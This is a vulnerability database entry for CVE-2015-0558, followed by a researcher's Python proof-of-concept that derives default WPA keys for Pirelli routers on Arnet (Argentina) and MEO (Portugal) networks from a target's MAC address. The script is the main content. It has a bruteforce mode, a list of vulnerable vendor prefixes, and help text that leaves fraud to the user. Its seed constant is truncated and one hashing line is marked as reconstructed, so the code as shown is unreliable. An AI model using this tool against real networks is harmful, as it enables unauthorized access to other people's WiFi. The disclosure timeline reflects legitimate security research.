ADB P.DGA4001N router security vulnerability

Vulnerability ID: 1208647    Vulnerability type: Other
Published: 2015-05-09    Updated: 2020-01-21
CVE ID: CVE-2015-0558    CNNVD ID: CNNVD-202001-443
Platform: N/A    CVSS score: N/A
ADB P.DGA4001N is a modem product. A security vulnerability exists in ADB P.DGA4001N devices running firmware version PDG_TEF_SP_4.06L.6 (other routers may also be affected); it stems from the device using a default WPA key generation algorithm, so the default key can be derived from the device's MAC address. No further information on this vulnerability is currently available; follow CNNVD or vendor advisories for updates.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
r"""
@license: GPLv3
@author : Eduardo Novella
@contact: ednolo[a]
@twitter: @enovella_

[*] Target      :
Vendor           : ADB broadband Pirelli
Router           : Model P.DG-A4001N
ISP              : Arnet Telecom Argentina, MEO Portugal
Possible-targets :
Firmware         : (ARG)

[*] References  :
[0] [AUSTRIA]   A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness
[1] [ITALY]     Alice AGPF: The algorithm!
[2] [ARGENTINA] CVE-2015-0558: Reverse-engineering the default WPA key generation
                algorithm for Pirelli routers in Argentina
[3] [PORTUGAL]

[*] Test vectors ARG :

[*] Acknowledgements  :
-> Thanks to fernando3k for giving me the firmware in order to do reverse-engineering on it, and christian32 for showing me a bunch of test vectors.
-> Thanks to Nicolás Chaves for spotting a problem between WLAN and LAN mac addresses.
-> Thanks to Kara Davis for working with me in Portugal Pirelli

[*] Timeline    :
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PMs about the same. They do not want to be aware of the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all, given its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure and CVE-2015-0558 assigned

2015-04-01  I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm
2015-04-05  Send a message to @MEOpt via Twitter @enovella_
2015-04-05  I got a response in a matter of minutes \o/
2015-04-05  I send an email to , stating the reference 3-78405621289 in the email subject
2015-05-07  Full disclosure

[*] Changelog   :
2015-05-06   v1.4         Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX
2015-02-01   v1.3         Final version, hopefully
2015-01-12   v1.2         Confusion between LAN and WLAN mac address
2015-01-10   v1.1         --allKeys flag added
2014-09-11   v1.0         First PoC working
"""

import re
import sys
import hashlib
import argparse

VERSION     = 1
SUBVERSION  = 4          # v1.4, matching the changelog above
DATEVERSION = '2015-05-06'
URL         = ''

def genkey(mac, stdout=True):
    # Constant seed extracted from the firmware. Only the first 16 bytes survive
    # on this page; the remaining seed bytes are truncated here.
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '')  # [remaining seed bytes truncated on this page]

    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'

    sha256 = hashlib.sha256()
    # The update call is missing on this page; reconstructed as "seed followed by
    # the 6 raw MAC bytes", which is the input genkey() receives.
    sha256.update(seed + str(mac))

    digest = bytearray(sha256.digest())

    if stdout:
        print "[+] SHA256  : %s" % sha256.hexdigest()
    # Map the first 10 digest bytes onto the alphanumeric lookup table
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

def printTargets():
    print "[+] Possible vulnerable targets so far:"
    for t in targets:
        print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper()))


def checkTargets(bssid):
    # Warn when the BSSID's OUI is not one of the known affected vendor prefixes
    supported = False
    for t in targets:
        if bssid.upper().startswith(t):
            supported = True
    if not supported:
        print "[!] Your bssid looks like not supported! Generating anyway."

def addIncToMac(mac_str, inc):
    # Treat the 12 hex digits as an integer, add inc, and return the 6 raw bytes
    try:
        mac = bytearray.fromhex('%012x' % (int(mac_str, 16) + inc))
    except (ValueError, TypeError):
        sys.exit('[!] Use real input :)')
    return mac

def main():
    global targets
    version = " {0:d}.{1:d}  [{2:s}] ----> {3:s}".format(VERSION, SUBVERSION, DATEVERSION, URL)
    # OUI prefixes of affected devices (the list is truncated on this page)
    targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54']
    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and
                                                 MEO in Portugal. So far only WiFi networks with essids like WiFi-Arnet-XXXX
                                                 or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable. See
                                        for more details. Twitter: @enovella_  and
                                                 email: ednolo[at] This software is used just as proof-of-concept,
                                                 commit fraud depends on you!   ''',
                                     epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' % (sys.argv[0]))
    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b', '--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s' + version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l', '--list', help='List all vulnerable targets', action='store_true')
    command_group.add_argument('-a', '--allkeys', help='Bruteforce mode', action="store_true")
    args = parser.parse_args()

    if args.list:
        printTargets()
    elif args.bssid:
        # Strip separators and keep only the 12 hex digits of the MAC
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')
        else:
            checkTargets(args.bssid)
            print '[+] MAC     : %s' % args.bssid

            if args.allkeys:
                # The WLAN MAC can be offset from the BSSID by a few units (see the
                # v1.2 changelog entry), so keys are derived for the neighbouring MACs too
                print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)'
                for i in xrange(-2, 5):
                    mac = addIncToMac(mac_str, i)
                    print '%-10s' % (genkey(mac, False))

                # Portuguese MEO networks use the first 8 characters of the same key
                print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX  (Portugal)'
                for i in xrange(-2, 5):
                    mac = addIncToMac(mac_str, i)
                    print '%-10s' % (genkey(mac, False)[:8])
            else:
                wpa = genkey(addIncToMac(mac_str, 0), False)
                print '[+] WPA key : %-10s\t%-10s' % (wpa,     "SSID: WiFi-Arnet-XXXX (Argentina)")
                print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX  (Portugal)")
    else:
        sys.exit('[!] Are you trying to crash me? :)')

if __name__ == "__main__":
    main()